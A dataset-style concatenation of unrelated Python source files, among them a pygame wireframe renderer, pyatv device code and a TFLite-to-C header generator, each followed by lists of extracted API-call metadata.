] | [((895, 920), 'networkx.dag_to_branching', 'dag_to_branching', (['circuit'], {}), '(circuit)\n', (911, 920), False, 'from networkx import dag_to_branching\n'), ((2748, 2757), 'networkx.DiGraph', 'DiGraph', ([], {}), '()\n', (2755, 2757), False, 'from networkx import DiGraph\n'), ((1584, 1611), 'networkx.utils.arbitrary_element', 'arbitrary_element', (['children'], {}), '(children)\n', (1601, 1611), False, 'from networkx.utils import arbitrary_element\n')] |
import pygame
import numpy as np
from math import *
import json
# Colour constants (RGB) and render settings.
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
# NOTE(review): RAINBOW is currently identical to BLACK — presumably a
# placeholder for an animated colour; confirm intent.
RAINBOW = (0, 0, 0)
# When True, drawLine strokes with RAINBOW instead of BLACK.
rainbow = True
WIDTH, HEIGHT = 800, 600
#WIDTH, HEIGHT = 1600, 900
def drawLine(point1, point2, screen):
    """Draw a segment between two projected 2-D points on *screen*."""
    # `rainbow` is a module-level flag selecting the stroke colour.
    color = RAINBOW if rainbow else BLACK
    pygame.draw.line(screen, color, (point1[0], point1[1]), (point2[0], point2[1]))
def rotateX(angle):
    """Return the 3x3 rotation matrix about the x-axis by *angle* radians."""
    c, s = cos(angle), sin(angle)
    return np.matrix([
        [1, 0, 0],
        [0, c, -s],
        [0, s, c]
    ])
def rotateY(angle):
    """Return the 3x3 rotation matrix about the y-axis by *angle* radians."""
    c, s = cos(angle), sin(angle)
    return np.matrix([
        [c, 0, s],
        [0, 1, 0],
        [-s, 0, c]
    ])
def rotateZ(angle):
    """Return the 3x3 rotation matrix about the z-axis by *angle* radians."""
    c, s = cos(angle), sin(angle)
    return np.matrix([
        [c, -s, 0],
        [s, c, 0],
        [0, 0, 1]
    ])
def projectPoint(point, angle, offset, scale):
    """Rotate a 3-D point and project it onto screen coordinates.

    Applies a fixed 90° x-axis pre-tilt followed by the x/y/z Euler steps in
    *angle*, drops the z component, then scales and centres the result.
    (*offset* is accepted for interface compatibility but not used here —
    the caller bakes it into *point* beforehand.)
    """
    rotated = point.reshape(3, 1)
    # Same rotation sequence and order as before, applied one matrix at a time.
    for rotation in (rotateX(pi / 2), rotateX(angle[0]), rotateY(angle[1]), rotateZ(angle[2])):
        rotated = np.dot(rotation, rotated)
    projected = np.dot(np.matrix([[1, 0, 0], [0, 1, 0]]), rotated)
    x = int(projected[0][0] * scale) + WIDTH/2
    y = int(projected[1][0] * scale) + HEIGHT/2
    return [x, y]
def renderObject(objectPath, offset, angle, scale, screen):
    """Load an object description from a JSON file and draw it on *screen*.

    The JSON may contain "points" (name -> 3-D coordinate), "lines"
    (point-name -> point-name pairs), and nested "objects" which are
    rendered recursively with their own offset/angle/scale.
    """
    # NOTE(review): the file handle is never closed — consider a `with` block.
    f = open(objectPath)
    data = json.load(f)
    points = data.get("points")
    if points:
        # Project every named 3-D point; the results are serialized into a
        # JSON string and parsed back to build the name -> [x, y] mapping.
        temp = ""
        for pointName in points:
            point = points.get(pointName)
            point = np.matrix(point)+np.matrix([offset])
            temp += '"'+pointName+'":'+str(projectPoint(point, angle, offset, scale))+','
        projectedPoints = json.loads('{'+temp[:-1]+'}')
    lines = data.get("lines")
    if lines:
        # Each line maps a start point name to an end point name.
        for line in lines:
            for p1name in line:
                p1 = p1name
                p2 = projectedPoints.get(line.get(p1))
                p1 = projectedPoints.get(p1)
                drawLine(p1, p2, screen)
    objects = data.get("objects")
    if objects:
        # Recurse into child objects, rescaling the parent offset into the
        # child's coordinate system and accumulating the rotation angles.
        for obj in objects:
            renderObject(obj.get("objectPath"), np.squeeze(np.array(np.matrix(obj.get("offset"))+np.matrix(offset)*scale/obj.get("scale"))) ,np.squeeze(np.array(np.matrix(obj["angle"])+ angle)), obj.get("scale"), screen)
# Main render loop: open the window and spin two JSON-defined objects.
screen = pygame.display.set_mode((WIDTH, HEIGHT))
clock = pygame.time.Clock()
angle = 0
while True:
    # Cap the frame rate at 60 FPS so the spin rate stays constant.
    clock.tick(60)
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            pygame.quit()
            exit()
    angle += 0.01
    screen.fill(WHITE)
    # Draw the scene for this frame.
    renderObject("objects/2squares.json", [0, 0, 0], [angle, angle, angle], 100, screen)
    renderObject("objects/square.json", [0, 0, 1], [angle, angle, angle], 100, screen)
    pygame.display.update()
| [
"json.loads",
"pygame.quit",
"pygame.draw.line",
"pygame.event.get",
"pygame.display.set_mode",
"pygame.time.Clock",
"json.load",
"pygame.display.update",
"numpy.matrix"
] | [((2393, 2433), 'pygame.display.set_mode', 'pygame.display.set_mode', (['(WIDTH, HEIGHT)'], {}), '((WIDTH, HEIGHT))\n', (2416, 2433), False, 'import pygame\n'), ((2442, 2461), 'pygame.time.Clock', 'pygame.time.Clock', ([], {}), '()\n', (2459, 2461), False, 'import pygame\n'), ((1431, 1443), 'json.load', 'json.load', (['f'], {}), '(f)\n', (1440, 1443), False, 'import json\n'), ((2566, 2584), 'pygame.event.get', 'pygame.event.get', ([], {}), '()\n', (2582, 2584), False, 'import pygame\n'), ((2920, 2943), 'pygame.display.update', 'pygame.display.update', ([], {}), '()\n', (2941, 2943), False, 'import pygame\n'), ((259, 344), 'pygame.draw.line', 'pygame.draw.line', (['screen', 'RAINBOW', '(point1[0], point1[1])', '(point2[0], point2[1])'], {}), '(screen, RAINBOW, (point1[0], point1[1]), (point2[0],\n point2[1]))\n', (275, 344), False, 'import pygame\n'), ((359, 438), 'pygame.draw.line', 'pygame.draw.line', (['screen', 'BLACK', '(point1[0], point1[1])', '(point2[0], point2[1])'], {}), '(screen, BLACK, (point1[0], point1[1]), (point2[0], point2[1]))\n', (375, 438), False, 'import pygame\n'), ((1175, 1208), 'numpy.matrix', 'np.matrix', (['[[1, 0, 0], [0, 1, 0]]'], {}), '([[1, 0, 0], [0, 1, 0]])\n', (1184, 1208), True, 'import numpy as np\n'), ((1757, 1790), 'json.loads', 'json.loads', (["('{' + temp[:-1] + '}')"], {}), "('{' + temp[:-1] + '}')\n", (1767, 1790), False, 'import json\n'), ((2636, 2649), 'pygame.quit', 'pygame.quit', ([], {}), '()\n', (2647, 2649), False, 'import pygame\n'), ((1604, 1620), 'numpy.matrix', 'np.matrix', (['point'], {}), '(point)\n', (1613, 1620), True, 'import numpy as np\n'), ((1621, 1640), 'numpy.matrix', 'np.matrix', (['[offset]'], {}), '([offset])\n', (1630, 1640), True, 'import numpy as np\n'), ((2322, 2345), 'numpy.matrix', 'np.matrix', (["obj['angle']"], {}), "(obj['angle'])\n", (2331, 2345), True, 'import numpy as np\n'), ((2258, 2275), 'numpy.matrix', 'np.matrix', (['offset'], {}), '(offset)\n', (2267, 2275), True, 'import numpy as 
np\n')] |
from xrsolver import Problem
import solver
# This example is the second case from https://www.youtube.com/watch?v=WJEZh7GWHnw
# Build the LP: five variables bounded to [0, 3], blending constraints, and a
# linear objective over the mix.
lp_solver = solver.Solver()
problem = Problem()

variables = [problem.generateVariable(f"x{i}", lb=0, ub=3) for i in range(1, 6)]
x1, x2, x3, x4, x5 = variables
for variable in variables:
    problem.addVariable(variable)

# Ratio constraints plus a fixed total of 10 units.
problem.appendConstraint(x1 + x2 <= 5)
problem.appendConstraint(x2 <= 0.5 * (x1 + x2))
problem.appendConstraint(x5 >= 0.4 * (x3 + x4))
problem.appendConstraint(x1 + x2 + x3 + x4 + x5 == 10)

problem.appendObjective(8.1 * x1 + 10.5 * x2 + 6.4 * x3 + 7.5 * x4 + 5.0 * x5)
lp_solver.solveProblem(problem)

# Report the solved value of every variable.
for name, variable in zip(("x1", "x2", "x3", "x4", "x5"), variables):
    print(name, "=", variable.getValue())
| [
"xrsolver.Problem",
"solver.Solver"
] | [((133, 148), 'solver.Solver', 'solver.Solver', ([], {}), '()\n', (146, 148), False, 'import solver\n'), ((154, 163), 'xrsolver.Problem', 'Problem', ([], {}), '()\n', (161, 163), False, 'from xrsolver import Problem\n')] |
"""Main routines for interacting with an Apple TV."""
import asyncio
import datetime # noqa
from ipaddress import IPv4Address
from typing import List
import aiohttp
from pyatv import conf, exceptions, interface
from pyatv.airplay import AirPlayStreamAPI
from pyatv.const import Protocol
from pyatv.dmap import DmapAppleTV
from pyatv.dmap.pairing import DmapPairingHandler
from pyatv.mrp import MrpAppleTV
from pyatv.mrp.pairing import MrpPairingHandler
from pyatv.airplay.pairing import AirPlayPairingHandler
from pyatv.support import net
from pyatv.support.scan import BaseScanner, UnicastMdnsScanner, MulticastMdnsScanner
async def scan(
    loop: asyncio.AbstractEventLoop,
    timeout: int = 5,
    identifier: str = None,
    protocol: Protocol = None,
    hosts: List[str] = None,
) -> List[conf.AppleTV]:
    """Scan for Apple TVs on network and return their configurations."""

    def _accept(candidate):
        # Keep only usable devices that match the optional filters.
        if not candidate.ready:
            return False
        if identifier and identifier not in candidate.all_identifiers:
            return False
        if protocol and candidate.get_service(protocol) is None:
            return False
        return True

    scanner: BaseScanner
    if hosts:
        scanner = UnicastMdnsScanner([IPv4Address(host) for host in hosts], loop)
    else:
        scanner = MulticastMdnsScanner(loop, identifier)

    discovered = await scanner.discover(timeout)
    return [device for device in discovered.values() if _accept(device)]
async def connect(
    config: conf.AppleTV,
    loop: asyncio.AbstractEventLoop,
    protocol: Protocol = None,
    session: aiohttp.ClientSession = None,
) -> interface.AppleTV:
    """Connect to a device based on a configuration."""
    if config.identifier is None:
        raise exceptions.DeviceIdMissingError("no device identifier")

    service = config.main_service(protocol=protocol)

    # Pick the concrete client class for the service's protocol.
    implementations = {Protocol.DMAP: DmapAppleTV, Protocol.MRP: MrpAppleTV}
    implementation = implementations.get(service.protocol)
    if implementation is None:
        raise exceptions.UnsupportedProtocolError(str(service.protocol))

    # AirPlay stream API is the same for both DMAP and MRP
    airplay = AirPlayStreamAPI(config, loop)

    http_session = await net.create_session(session)
    atv = implementation(loop, http_session, config, airplay)
    await atv.connect()
    return atv
async def pair(
    config: conf.AppleTV,
    protocol: Protocol,
    loop: asyncio.AbstractEventLoop,
    session: aiohttp.ClientSession = None,
    **kwargs
):
    """Pair a protocol for an Apple TV."""
    service = config.get_service(protocol)
    if not service:
        raise exceptions.NoServiceError(
            "no service available for protocol " + str(protocol)
        )

    # Each protocol has its own pairing handshake implementation.
    pairing_handlers = {
        Protocol.DMAP: DmapPairingHandler,
        Protocol.MRP: MrpPairingHandler,
        Protocol.AirPlay: AirPlayPairingHandler,
    }
    handler = pairing_handlers.get(protocol)
    if handler is None:
        raise exceptions.UnsupportedProtocolError(str(protocol))

    http_session = await net.create_session(session)
    return handler(config, http_session, loop, **kwargs)
| [
"pyatv.support.scan.MulticastMdnsScanner",
"pyatv.support.net.create_session",
"ipaddress.IPv4Address",
"pyatv.airplay.AirPlayStreamAPI",
"pyatv.exceptions.DeviceIdMissingError"
] | [((2170, 2200), 'pyatv.airplay.AirPlayStreamAPI', 'AirPlayStreamAPI', (['config', 'loop'], {}), '(config, loop)\n', (2186, 2200), False, 'from pyatv.airplay import AirPlayStreamAPI\n'), ((1320, 1358), 'pyatv.support.scan.MulticastMdnsScanner', 'MulticastMdnsScanner', (['loop', 'identifier'], {}), '(loop, identifier)\n', (1340, 1358), False, 'from pyatv.support.scan import BaseScanner, UnicastMdnsScanner, MulticastMdnsScanner\n'), ((1772, 1827), 'pyatv.exceptions.DeviceIdMissingError', 'exceptions.DeviceIdMissingError', (['"""no device identifier"""'], {}), "('no device identifier')\n", (1803, 1827), False, 'from pyatv import conf, exceptions, interface\n'), ((2239, 2266), 'pyatv.support.net.create_session', 'net.create_session', (['session'], {}), '(session)\n', (2257, 2266), False, 'from pyatv.support import net\n'), ((3004, 3031), 'pyatv.support.net.create_session', 'net.create_session', (['session'], {}), '(session)\n', (3022, 3031), False, 'from pyatv.support import net\n'), ((1248, 1265), 'ipaddress.IPv4Address', 'IPv4Address', (['host'], {}), '(host)\n', (1259, 1265), False, 'from ipaddress import IPv4Address\n')] |
import glob
import os
from doc2vec import read_file, embed_document
def get_file_embeddings():
    """Collect every .txt/.pdf/.docx under the current directory and embed each.

    Returns:
        (file_names, vector_list) — parallel lists of file paths and their
        document embeddings.
    """
    file_names = []
    for pattern in ('**/*.txt', '**/*.pdf', '**/*.docx'):
        file_names.extend(glob.glob(pattern, recursive=True))

    print("Retrieved files:")
    for filename in file_names:
        print(filename)

    vector_list = []
    for path in file_names:
        vector_list.append(embed_document(read_file(path)))
    print("Processing files...")
    return file_names, vector_list
def write_folders(named_folders):
    """Move each group of files into a sibling directory named after its group.

    *named_folders* maps a folder name to a list of file paths; every file is
    renamed into ``<file's directory>/<folder name>``, created on demand.
    Empty groups are skipped entirely (no directory is created).
    """
    for directory, files in named_folders.items():
        if not files:
            continue
        for src in files:
            src_abs = os.path.abspath(src)
            target_dir = os.path.join(os.path.dirname(src_abs), directory)
            if not os.path.exists(target_dir):
                os.mkdir(target_dir)
            os.rename(src, os.path.join(target_dir, os.path.basename(src_abs)))
        print(f"Moved {len(files)} files to folder named {directory}.")
| [
"os.path.exists",
"os.mkdir",
"os.path.abspath",
"doc2vec.read_file",
"glob.glob"
] | [((158, 195), 'glob.glob', 'glob.glob', (['"""**/*.txt"""'], {'recursive': '(True)'}), "('**/*.txt', recursive=True)\n", (167, 195), False, 'import glob\n'), ((212, 249), 'glob.glob', 'glob.glob', (['"""**/*.pdf"""'], {'recursive': '(True)'}), "('**/*.pdf', recursive=True)\n", (221, 249), False, 'import glob\n'), ((267, 305), 'glob.glob', 'glob.glob', (['"""**/*.docx"""'], {'recursive': '(True)'}), "('**/*.docx', recursive=True)\n", (276, 305), False, 'import glob\n'), ((523, 538), 'doc2vec.read_file', 'read_file', (['file'], {}), '(file)\n', (532, 538), False, 'from doc2vec import read_file, embed_document\n'), ((968, 992), 'os.path.exists', 'os.path.exists', (['new_path'], {}), '(new_path)\n', (982, 992), False, 'import os\n'), ((1010, 1028), 'os.mkdir', 'os.mkdir', (['new_path'], {}), '(new_path)\n', (1018, 1028), False, 'import os\n'), ((878, 899), 'os.path.abspath', 'os.path.abspath', (['file'], {}), '(file)\n', (893, 899), False, 'import os\n'), ((1223, 1244), 'os.path.abspath', 'os.path.abspath', (['file'], {}), '(file)\n', (1238, 1244), False, 'import os\n')] |
#!/usr/bin/env python3
import sys
import os
import argparse
from string import Template
import re
# Patch site-packages to find numpy
import jinja2
# Locate the bundled ext-site-packages directory relative to jinja2's install
# location (the directory layout differs by one level on Windows) and put it
# on sys.path so the vendored packages described below become importable.
if sys.platform.startswith("win"):
    site_packages_path = os.path.abspath(os.path.join(os.path.dirname(jinja2.__file__), "../../../ext-site-packages"))
else:
    site_packages_path = os.path.abspath(os.path.join(os.path.dirname(jinja2.__file__), "../../../../ext-site-packages"))

if os.path.exists(site_packages_path):
    if site_packages_path not in sys.path:
        sys.path.insert(0, site_packages_path)
"""
Generation of parameter files requires the tflite_model, tflite_model_parameters
and tensorflow_lite_support packages. Because these packages are not installed
in the uc-generation environment where this python script will be run, these
packages are supplied as source. tflite_model and tflite_model_parameters were
fetched from internal repos, while the tensorflow_lite_support was fetched from
https://github.com/tensorflow/tflite-support.
"""
import tflite.Model
from tflite_model import TfliteModel
from tflite_model_parameters import TfliteModelParameters
template_model_h = """// Auto-generated serialization of TFLite flatbuffers in config directory
#ifndef SL_TFLITE_MICRO_MODEL_H
#define SL_TFLITE_MICRO_MODEL_H
#ifdef __cplusplus
extern "C" {
#endif
#include <stdint.h>
${data}
extern const uint8_t *default_model_array;
extern const uint32_t default_model_len;
#ifdef __cplusplus
}
#endif
#endif // SL_TFLITE_MICRO_MODEL_H
"""
template_model_h_single ="""
extern const uint8_t ${model_name}_array[];
extern const uint32_t ${model_name}_len;
"""
template_model_c = """// Auto-generated serialization of TFLite flatbuffers in config directory
#include "em_device.h"
#include "sl_tflite_micro_model.h"
${data}
const uint8_t *default_model_array = ${model_name}_array;
const uint32_t default_model_len = ${data_len}UL;
"""
template_model_c_single = """
const uint8_t ${model_name}_array[] __ALIGNED(4) = {
${data}
};
const uint32_t ${model_name}_len = ${data_len}UL;
"""
template_opcode_resolver_h = """// Auto-generated macro to instanciate and initialize opcode resolver based on TFLite flatbuffers in config directory
#ifndef SL_TFLITE_MICRO_OPCODE_RESOLVER_H
#define SL_TFLITE_MICRO_OPCODE_RESOLVER_H
#define SL_TFLITE_MICRO_OPCODE_RESOLVER(opcode_resolver, error_reporter) \\
static tflite::MicroMutableOpResolver<${data_len}> opcode_resolver(error_reporter); \\
${data}
#endif // SL_TFLITE_MICRO_OPCODE_RESOLVER_H
"""
template_model_parameter_single = """#define SL_${model_name}_${config_key} ${config_val}
"""
template_model_default_parameter_single = """#define SL_DEFAULT_MODEL_${config_key} SL_${model_name}_${config_key}
"""
template_model_parameters_h = """// Auto-generated parameters from TFLite flatbuffers in config directory
#ifndef SL_TFLITE_MICRO_MODEL_PARAMETERS_H
#define SL_TFLITE_MICRO_MODEL_PARAMETERS_H
${data}
#endif // SL_TFLITE_MICRO_MODEL_PARAMETERS_H
"""
"""
The following dictionary has been created using the BuiltinOperator enum defining operatior values, see schema_generated.h, and
function names defined in the MicroMutableOpResolver object, see micro_mutable_op_resolver.h.
"""
opcode_dict = {
101: 'AddAbs',
0: 'AddAdd',
106: 'AddAddN',
56: 'AddArgMax',
79: 'AddArgMin',
1: 'AddAveragePool2D',
104: 'AddCeil',
2: 'AddConcatenation',
3: 'AddConv2D',
108: 'AddCos',
4: 'AddDepthwiseConv2D',
6: 'AddDequantize',
71: 'AddEqual',
8: 'AddFloor',
9: 'AddFullyConnected',
61: 'AddGreater',
62: 'AddGreaterEqual',
117: 'AddHardSwish',
11: 'AddL2Normalization',
58: 'AddLess',
63: 'AddLessEqual',
73: 'AddLog',
86: 'AddLogicalAnd',
87: 'AddLogicalNot',
84: 'AddLogicalOr',
14: 'AddLogistic',
55: 'AddMaximum',
17: 'AddMaxPool2D',
40: 'AddMean',
57: 'AddMinimum',
18: 'AddMul',
59: 'AddNeg',
73: 'AddNotEqual',
83: 'AddPack',
34: 'AddPad',
60: 'AddPadV2',
54: 'AddPrelu',
114: 'AddQuantize',
82: 'AddReduceMax',
19: 'AddRelu',
21: 'AddRelu6',
22: 'AddReshape',
97: 'AddResizeNearestNeighbor',
116: 'AddRound',
76: 'AddRsqrt',
77: 'AddShape',
66: 'AddSin',
25: 'AddSoftmax',
47: 'AddSplit',
102: 'AddSplitV',
75: 'AddSqrt',
92: 'AddSquare',
45: 'AddStridedSlice',
41: 'AddSub',
27: 'AddSvdf',
28: 'AddTanh',
67: 'AddTransposeConv',
88: 'AddUnpack'
}
def sanitize_filename(name):
    """Turn *name* into a valid C identifier stem.

    Drops every character outside [A-Za-z0-9_], then strips leading digits
    because a C identifier cannot start with a number.
    """
    cleaned = re.sub(r'[^a-zA-Z0-9_]', '', name)
    return cleaned.lstrip('0123456789')
def find_tflite_files(input_dir):
    """Yield (sanitized_model_name, raw_bytes) for each .tflite in *input_dir*."""
    for entry in os.listdir(input_dir):
        stem, extension = os.path.splitext(entry)
        if extension != '.tflite':
            continue
        with open(os.path.join(input_dir, entry), 'rb') as fd:
            contents = fd.read()
        yield sanitize_filename(stem), contents
def generate_c_array(buf):
    """Format *buf* as comma-separated C hex byte literals, 12 per line.

    Continuation lines are indented two spaces to sit inside the generated
    array initializer.
    """
    rows = []
    for offset in range(0, len(buf), 12):
        chunk = buf[offset:offset + 12]
        rows.append(', '.join('0x{:02x}'.format(byte) for byte in chunk))
    return ', \n  '.join(rows)
def opcode_parse_opcode(opcode):
    """Translate one flatbuffer OperatorCode into {code_value: resolver_method}.

    Unknown operators are reported with a warning and mapped to a sentinel
    entry so the resolver generation can skip them.
    """
    custom = opcode.CustomCode()
    opcode_val = custom if custom is not None else opcode.BuiltinCode()
    func = opcode_dict.get(opcode_val)
    if func is None:
        print(f"tflite.py WARNING: An unknown operator with code value={opcode_val} has been discovered. It will not be automatic initialized.")
        return {-1: "UndefinedOp"}
    return {opcode_val: func}
def opcode_parse_model(model):
    """Collect {code: resolver_method} entries for every operator in *model*."""
    collected = {}
    for idx in range(model.OperatorCodesLength()):
        collected.update(opcode_parse_opcode(model.OperatorCodes(idx)))
    return collected
def generate_files(input_dir, output_dir):
    """Serialize every .tflite in *input_dir* into C sources in *output_dir*.

    Emits sl_tflite_micro_model.c/.h (byte arrays + extern declarations),
    sl_tflite_micro_opcode_resolver.h (resolver init macro), and — when any
    model carries embedded parameters — sl_tflite_micro_model_parameters.h.
    """
    tc = Template(template_model_c_single)
    th = Template(template_model_h_single)
    data_c = ''
    data_h = ''
    parameter_defines = ''
    opcodes = {}
    for model_name, buf in find_tflite_files(input_dir):
        # Accumulate the per-model array definition and extern declaration.
        props = {
            'model_name': model_name,
            'data': generate_c_array(buf),
            'data_len': len(buf),
        }
        data_c += tc.substitute(**props)
        data_h += th.substitute(**props)
        # Collect the operator codes used by this model.
        model = tflite.Model.Model.GetRootAsModel(buf)
        opcodes.update(opcode_parse_model(model))
        # Extract model parameters
        # NOTE(review): the bare except deliberately treats any parse failure
        # as "no parameters", but it also hides real errors — consider
        # narrowing the exception type.
        try:
            loaded_model_params = TfliteModelParameters.load_from_tflite_flatbuffer(buf)
        except:
            loaded_model_params = {}
        if loaded_model_params:
            param_define_t = Template(template_model_parameter_single)
            default_define_t = Template(template_model_default_parameter_single)
            parameter_defines += f'// Definitions generated from {model_name}.tflite\n'
            default_model_defines = f'// Default model parameters\n'
            for key, value in sorted(loaded_model_params.items()):
                # Ensure valid C code:
                if type(value) == str:
                    value = f'"{value}"'
                elif type(value) == bool:
                    value = str(value).lower()
                props = {
                    'model_name': model_name.upper(),
                    'config_key': key.replace('.', '_').upper(),
                    'config_val': value,
                }
                parameter_defines += param_define_t.substitute(**props)
                default_model_defines += default_define_t.substitute(**props)
            parameter_defines += '\n'
        # NOTE(review): the .c/.h files are rewritten on every iteration, and
        # `tc`/`th` are clobbered here with the *full-file* templates — with
        # more than one .tflite file the next iteration substitutes the wrong
        # template into data_c/data_h.  Confirm multi-model input is intended.
        tc = Template(template_model_c)
        with open(os.path.join(output_dir, 'sl_tflite_micro_model.c'), 'w') as fd:
            fd.write(tc.substitute(data=data_c, model_name=model_name, data_len=len(buf)))
        th = Template(template_model_h)
        with open(os.path.join(output_dir, 'sl_tflite_micro_model.h'), 'w') as fd:
            fd.write(th.substitute(data=data_h))
    tm = Template(template_opcode_resolver_h)
    opcode_len = len(opcodes)
    opcode_str = ''
    # Only emit this file if model parameters are available
    if parameter_defines:
        tp = Template(template_model_parameters_h)
        with open(os.path.join(output_dir, 'sl_tflite_micro_model_parameters.h'), 'w') as fd:
            fd.write(tp.substitute(data=(parameter_defines + default_model_defines)))
    # Emit one resolver AddXxx() call per discovered operator, skipping CUSTOM.
    for opcode_key in opcodes.keys():
        if opcode_key != 32: # CUSTOM opcode
            opcode_str += f"opcode_resolver.{opcodes[opcode_key]}(); \\\n"
    with open(os.path.join(output_dir, 'sl_tflite_micro_opcode_resolver.h'), 'w') as fd:
        fd.write(tm.substitute({'data_len':str(opcode_len), 'data':opcode_str}))
def entry():
parser = argparse.ArgumentParser(description='TensorFlow Lite flatbuffer to C converter.')
parser.add_argument('-i', required=True, help='Input directory containing .tflite files')
parser.add_argument('-o', required=True, help='Output directory to populate with serialized content.')
args = parser.parse_args()
generate_files(args.i, args.o)
entry() | [
"os.path.exists",
"tflite_model_parameters.TfliteModelParameters.load_from_tflite_flatbuffer",
"os.listdir",
"string.Template",
"sys.path.insert",
"argparse.ArgumentParser",
"sys.platform.startswith",
"os.path.join",
"os.path.splitext",
"os.path.dirname",
"re.sub"
] | [((153, 183), 'sys.platform.startswith', 'sys.platform.startswith', (['"""win"""'], {}), "('win')\n", (176, 183), False, 'import sys\n'), ((431, 465), 'os.path.exists', 'os.path.exists', (['site_packages_path'], {}), '(site_packages_path)\n', (445, 465), False, 'import os\n'), ((4618, 4651), 're.sub', 're.sub', (['"""[^a-zA-Z0-9_]"""', '""""""', 'name'], {}), "('[^a-zA-Z0-9_]', '', name)\n", (4624, 4651), False, 'import re\n'), ((4791, 4812), 'os.listdir', 'os.listdir', (['input_dir'], {}), '(input_dir)\n', (4801, 4812), False, 'import os\n'), ((5954, 5987), 'string.Template', 'Template', (['template_model_c_single'], {}), '(template_model_c_single)\n', (5962, 5987), False, 'from string import Template\n'), ((5995, 6028), 'string.Template', 'Template', (['template_model_h_single'], {}), '(template_model_h_single)\n', (6003, 6028), False, 'from string import Template\n'), ((7479, 7505), 'string.Template', 'Template', (['template_model_c'], {}), '(template_model_c)\n', (7487, 7505), False, 'from string import Template\n'), ((7674, 7700), 'string.Template', 'Template', (['template_model_h'], {}), '(template_model_h)\n', (7682, 7700), False, 'from string import Template\n'), ((7827, 7863), 'string.Template', 'Template', (['template_opcode_resolver_h'], {}), '(template_opcode_resolver_h)\n', (7835, 7863), False, 'from string import Template\n'), ((8552, 8638), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""TensorFlow Lite flatbuffer to C converter."""'}), "(description=\n 'TensorFlow Lite flatbuffer to C converter.')\n", (8575, 8638), False, 'import argparse\n'), ((512, 550), 'sys.path.insert', 'sys.path.insert', (['(0)', 'site_packages_path'], {}), '(0, site_packages_path)\n', (527, 550), False, 'import sys\n'), ((8002, 8039), 'string.Template', 'Template', (['template_model_parameters_h'], {}), '(template_model_parameters_h)\n', (8010, 8039), False, 'from string import Template\n'), ((237, 269), 'os.path.dirname', 'os.path.dirname', 
(['jinja2.__file__'], {}), '(jinja2.__file__)\n', (252, 269), False, 'import os\n'), ((360, 392), 'os.path.dirname', 'os.path.dirname', (['jinja2.__file__'], {}), '(jinja2.__file__)\n', (375, 392), False, 'import os\n'), ((6509, 6563), 'tflite_model_parameters.TfliteModelParameters.load_from_tflite_flatbuffer', 'TfliteModelParameters.load_from_tflite_flatbuffer', (['buf'], {}), '(buf)\n', (6558, 6563), False, 'from tflite_model_parameters import TfliteModelParameters\n'), ((6658, 6699), 'string.Template', 'Template', (['template_model_parameter_single'], {}), '(template_model_parameter_single)\n', (6666, 6699), False, 'from string import Template\n'), ((6725, 6774), 'string.Template', 'Template', (['template_model_default_parameter_single'], {}), '(template_model_default_parameter_single)\n', (6733, 6774), False, 'from string import Template\n'), ((7518, 7569), 'os.path.join', 'os.path.join', (['output_dir', '"""sl_tflite_micro_model.c"""'], {}), "(output_dir, 'sl_tflite_micro_model.c')\n", (7530, 7569), False, 'import os\n'), ((7713, 7764), 'os.path.join', 'os.path.join', (['output_dir', '"""sl_tflite_micro_model.h"""'], {}), "(output_dir, 'sl_tflite_micro_model.h')\n", (7725, 7764), False, 'import os\n'), ((8375, 8436), 'os.path.join', 'os.path.join', (['output_dir', '"""sl_tflite_micro_opcode_resolver.h"""'], {}), "(output_dir, 'sl_tflite_micro_opcode_resolver.h')\n", (8387, 8436), False, 'import os\n'), ((4821, 4840), 'os.path.splitext', 'os.path.splitext', (['f'], {}), '(f)\n', (4837, 4840), False, 'import os\n'), ((8054, 8116), 'os.path.join', 'os.path.join', (['output_dir', '"""sl_tflite_micro_model_parameters.h"""'], {}), "(output_dir, 'sl_tflite_micro_model_parameters.h')\n", (8066, 8116), False, 'import os\n'), ((4875, 4901), 'os.path.join', 'os.path.join', (['input_dir', 'f'], {}), '(input_dir, f)\n', (4887, 4901), False, 'import os\n'), ((4976, 4995), 'os.path.splitext', 'os.path.splitext', (['f'], {}), '(f)\n', (4992, 4995), False, 'import os\n')] |
from flask import Flask
app = Flask(__name__,static_folder='../static') | [
"flask.Flask"
] | [((31, 73), 'flask.Flask', 'Flask', (['__name__'], {'static_folder': '"""../static"""'}), "(__name__, static_folder='../static')\n", (36, 73), False, 'from flask import Flask\n')] |
import re
import urllib
import numbers
from clayful.models import register_models
from clayful.requester import request
from clayful.exception import ClayfulException
class Clayful:
base_url = 'https://api.clayful.io'
default_headers = {
'Accept-Encoding': 'gzip',
'User-Agent': 'clayful-python',
'Clayful-SDK': 'clayful-python'
}
plugins = {
'request': request
}
listeners = {
'request': [],
'response': []
}
@staticmethod
def options_to_headers(o = {}):
headers = {}
if 'language' in o:
headers['Accept-Language'] = o['language']
if 'currency' in o:
headers['Accept-Currency'] = o['currency']
if 'time_zone' in o:
headers['Accept-Time-Zone'] = o['time_zone']
if 'client' in o:
headers['Authorization'] = 'Bearer ' + o['client']
if 'customer' in o:
headers['Authorization-Customer'] = o['customer']
if 'reCAPTCHA' in o:
headers['reCAPTCHA-Response'] = o['reCAPTCHA'];
if 'debug_language' in o:
headers['Accept-Debug-Language'] = o['debug_language']
if 'headers' in o:
headers.update(o['headers'])
return headers
@staticmethod
def get_endpoint(path):
return Clayful.base_url + path
@staticmethod
def normalize_query_values(query = {}):
copied = query.copy()
for key in copied:
if isinstance(copied[key], bool):
copied[key] = 'true' if copied[key] == True else 'false'
if isinstance(copied[key], numbers.Number):
copied[key] = str(copied[key])
return copied
@staticmethod
def extract_request_arguments(options):
result = {
'http_method': options['http_method'],
'request_url': options['path'],
'payload': None,
'query': {},
'headers': {},
'meta': {}
}
rest = options['args'][len(options['params']):]
for i, key in enumerate(options['params']):
result['request_url'] = result['request_url'].replace('{' + key + '}', str(options['args'][i]))
if (options['http_method'] == 'POST' or options['http_method'] == 'PUT') and (options.get('without_payload', False) == False):
result['payload'] = (rest[0:1] or (None,))[0]
rest = rest[1:]
query_headers = (rest[0:1] or ({},))[0]
result['query'] = Clayful.normalize_query_values(query_headers.get('query', {}))
result['headers'] = Clayful.options_to_headers(query_headers)
result['meta'] = query_headers.get('meta', {})
return result
@staticmethod
def call_api(options):
extracted = Clayful.extract_request_arguments(options)
extracted.update({
'request_url': Clayful.get_endpoint(extracted['request_url']),
'model_name': options['model_name'],
'method_name': options['method_name'],
